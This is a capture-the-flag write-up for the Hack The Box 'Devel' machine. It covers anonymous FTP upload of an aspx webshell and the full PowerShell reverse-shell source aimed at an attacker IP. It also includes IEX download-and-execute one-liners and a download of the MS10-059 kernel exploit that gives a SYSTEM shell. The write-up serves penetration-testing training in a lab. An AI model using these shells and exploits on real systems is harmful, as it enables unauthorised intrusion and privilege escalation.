Today we are going to solve another CTF challenge “Devel” which is categories as retired lab presented by Hack the Box for making online penetration practices. Challenges in this lab are very easy to complete even for beginners.
Level: Beginners
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of Devel is 10.10.10. 5 so let’s initiate with nmap port enumeration.
root@kali:~/htb/devel# nmap -sC 10.10.10.5 Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-27 18:44 CET Nmap scan report for 10.10.10.5 Host is up (0.027s latency). Not shown: 998 filtered ports PORT STATE SERVICE 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 01:06AM <DIR> aspnet_client | 01-24-19 07:42PM 2834 devel.aspx | 01-27-19 10:59AM 2859 file.aspx | 01-26-19 11:41AM 2857 gay.aspx | 03-17-17 04:37PM 689 iisstart.htm | 01-25-19 12:47PM 2877 mshell.aspx | 01-26-19 11:46AM 0 nogay.aspx | 01-26-19 11:42PM 2876 task.aspx | 01-27-19 08:10AM 6 test.html |_03-17-17 04:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS7 Nmap done: 1 IP address (1 host up) scanned in 24.69 seconds
By using anonymous login credential you will get successfully access of FTP server via port 21.
root@kali:~/htb/devel# ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 03-18-17 01:06AM <DIR> aspnet_client 01-24-19 07:42PM 2834 devel.aspx 01-27-19 10:59AM 2859 file.aspx 01-26-19 11:41AM 2857 gay.aspx 03-17-17 04:37PM 689 iisstart.htm 01-25-19 12:47PM 2877 mshell.aspx 01-26-19 11:46AM 0 nogay.aspx 01-26-19 11:42PM 2876 task.aspx 01-27-19 08:10AM 6 test.html 03-17-17 04:37PM 184946 welcome.png 226 Transfer complete. ftp> bin 200 Type set to I. ftp> put shell.aspx local: shell.aspx remote: shell.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 2817 bytes sent in 0.00 secs (47.1316 MB/s) ftp>
We can see that an aspnet_client is present, so we try and upload an aspx webshell from the/usr/share/webshells/aspx folder in our Kali Linux machine.
This allows us to run system commands as the web server. We can now see more information about the system.
Without wasting time we used Nishang’s based puckieshell443.ps1
function Invoke-PowerShellTcp { [CmdletBinding(DefaultParameterSetName="reverse")] Param( [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] [String] $IPAddress, [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] [Int] $Port, [Parameter(ParameterSetName="reverse")] [Switch] $Reverse, [Parameter(ParameterSetName="bind")] [Switch] $Bind ) try { #Connect back if the reverse switch is used. if ($Reverse) { $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) } #Bind to the provided port if Bind switch is used. if ($Bind) { $listener = [System.Net.Sockets.TcpListener]$Port $listener.start() $client = $listener.AcceptTcpClient() } $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} #Send back current username and computername $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") $stream.Write($sendbytes,0,$sendbytes.Length) #Show an interactive PowerShell prompt $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') $stream.Write($sendbytes,0,$sendbytes.Length) while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString($bytes,0, $i) try { #Execute the command on the target. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) } catch { Write-Warning "Something went wrong with execution of command on the target." Write-Error $_ } $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' $x = ($error[0] | Out-String) $error.clear() $sendback2 = $sendback2 + $x #Return the results $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() if ($listener) { $listener.Stop() } } catch { Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." Write-Error $_ } } Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.15 -Port 443
Then transfer your puckieshell443.ps1 file into victims’ system
c:\Python37>python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.5 - - [06/Feb/2019 15:05:51] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15/puckieshell443.ps1')
Now time to execute our shell through a web browser as shown below in the image.
http://10.10.10.5/cmdpuck.aspx
After executing uploaded backdoor file come back to Netcat Listener and wait for session.
c:\PENTEST>nc -lvp 443 listening on [any] 443 ... 10.10.10.5: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.15] from (UNKNOWN) [10.10.10.5] 49163: NO_DATA Windows PowerShell running as user DEVEL$ on DEVEL Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\windows\system32\inetsrv>whoami iis apppool\web
Then I run a post Sherlock exploit
PS C:\windows\temp> iex(new-object net.webclient).downloadstring('http://10.10.14.15/Sherlock.ps1') Title : User Mode to Ring (KiTrap0D) MSBulletin : MS10-015 CVEID : 2010-0232 Link : https://www.exploit-db.com/exploits/11199/ VulnStatus : Appears Vulnerable Title : Task Scheduler .XML MSBulletin : MS10-092 CVEID : 2010-3338, 2010-3888 Link : https://www.exploit-db.com/exploits/19930/ VulnStatus : Appears Vulnerable Title : ClientCopyImage Win32k MSBulletin : MS15-051 CVEID : 2015-1701, 2015-2433 Link : https://www.exploit-db.com/exploits/37367/ VulnStatus : Appears Vulnerable
We use the windows exploit suggester against the systeminfo and note that this machine is vulnerable to MS10-059 and MS11-046.
https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe
c:\Python37>python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.5 - - [06/Feb/2019 19:23:11] "GET /puckieshell443.ps1 HTTP/1.1" 200 - 10.10.10.5 - - [06/Feb/2019 19:30:21] "GET /MS10-059.exe HTTP/1.1" 200 -
PS C:\windows\temp> (new-object net.webclient).downloadfile('http://10.10.14.20/MS10-059.exe', 'C:\windows\temp\MS10-059.exe') PS C:\windows\temp> dir MS10-059.exe Directory: C:\windows\temp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 10/2/2019 3:37 ?? 51434 lp.exe -a--- 10/2/2019 4:24 ?? 784384 MS10-059.exe
PS C:\windows\temp> ./MS10-059.exe 10.10.14.20 9876 /Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
Wonderful!! We had completed the task and hacked this box.
C:\Users\jacco>nc -lvp 9876 listening on [any] 9876 ... 10.10.10.5: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.5] 49170: NO_DATA Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\users\public>whoami whoami nt authority\system
c:\Users\Administrator\Desktop>type root.txt.txt type root.txt.txt e62*****b4b
PS C:\windows\temp> (New-Object System.Net.WebClient).DownloadFile("http://10.10.14.20/MS10-015.zip", "C:\Windows\Temp\MS10-015.zip")
A simple way of using ExtractToDirectory
from System.IO.Compression.ZipFile
:
Add-Type -AssemblyName System.IO.Compression.FileSystem
function unzip {
param( [string]$ziparchive, [string]$extractpath )
[System.IO.Compression.ZipFile]::ExtractToDirectory( $ziparchive, $extractpath )
}
unzip "D:\file.zip" "C:\temp"
Author: Puckiestyle